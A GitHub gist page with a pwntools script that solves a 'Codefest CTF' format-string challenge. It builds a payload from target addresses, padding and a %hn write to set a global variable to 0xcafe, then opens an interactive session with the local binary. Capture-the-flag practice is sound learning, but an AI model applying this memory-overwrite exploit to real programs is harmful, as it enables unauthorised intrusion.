Created
March 20, 2021 19:37
-
-
Save xmpf/eb6cb660c9639bd6183f5d7c72e8ade9 to your computer and use it in GitHub Desktop.
Codefest CTF: Format Strings [#pwn]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
''' | |
0x080492df <+52>: push 0x50 | |
0x080492e1 <+54>: lea eax,[ebp-0x58] | |
0x080492e4 <+57>: push eax | |
0x0804930d <+98>: call 0x80490a0 <printf@plt> | |
0x08049312 <+103>: add esp,0x10 | |
0x08049315 <+106>: mov eax,DWORD PTR [ebx+0x44] # 0x804c044 <position>: 0x00000000 | |
0x0804931b <+112>: cmp eax,0xcafe | |
0x08049320 <+117>: jne 0x8049339 <vuln+142> | |
''' | |
from pwn import * | |
import time | |
addr_low = p32(0x804c044) | |
addr_high = p32(0x804c046) | |
payload = b"" | |
payload += addr_low | |
payload += addr_high | |
payload += (f"%.{0xcafe - 8}x").encode() | |
r = process("./format") | |
# r = remote("chall.codefest.tech", 8744) | |
write_high = (f"%{4}$hn").encode() | |
p = payload + write_high | |
data = r.recvuntil("I will go") | |
r.readline() | |
log.info("Sending payload...") | |
r.sendline(p) | |
data = r.readline() | |
data = r.readline() | |
addr = data.decode().split(" ")[-1] | |
log.info(f"Memory address now contains: {addr}") | |
data = r.readline() | |
print("\t", data.decode('utf-8', errors='ignore')) | |
r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment